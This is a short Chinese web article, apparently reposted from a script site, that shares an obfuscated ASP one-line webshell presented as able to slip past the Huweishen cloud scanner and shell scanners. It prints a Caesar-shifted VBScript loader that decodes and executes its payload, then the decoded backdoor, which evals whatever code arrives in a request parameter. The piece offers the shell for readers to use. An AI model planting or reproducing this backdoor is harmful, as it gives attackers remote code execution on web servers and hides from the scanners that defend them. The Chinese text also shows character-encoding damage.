一句話木馬加密 過護(hù)衛(wèi)神云查殺系統(tǒng) 過shell掃描器
發(fā)布日期:2021-12-24 14:56 | 文章來源:腳本之家
分享給大家 暫時(shí)未測(cè)試 大家自己用用看
大馬的代碼是簡(jiǎn)單加密了下的!很容易解開看見 是加密的一段代碼
復(fù)制代碼
代碼如下:<%
codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
execute (decode (codeds) )
Function DeCode (Coded)
On Error Resume Next
For i = 1 To Len (Coded)
Curchar = Mid (Coded, i, 1)
If Asc (Curchar) = 16 then
Curchar = chr (8)
Elseif Asc (Curchar) = 24 then
Curchar = chr (12)
Elseif Asc (Curchar) = 32 then
Curchar = chr (18)
Else
Curchar = chr (Asc (Curchar) -3)
End if
DeCode = Decode&Curchar
Next
End Function
response.write(decode(codeds))
%>
很簡(jiǎn)單的加密,解開一看
復(fù)制代碼
代碼如下:<%
If request("xx") ="x" then eval request("hkmjj") end if
%>
經(jīng)過測(cè)試,發(fā)現(xiàn)過目前的護(hù)衛(wèi)神云查殺系統(tǒng),這個(gè)貌似用的人挺多的
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。
相關(guān)文章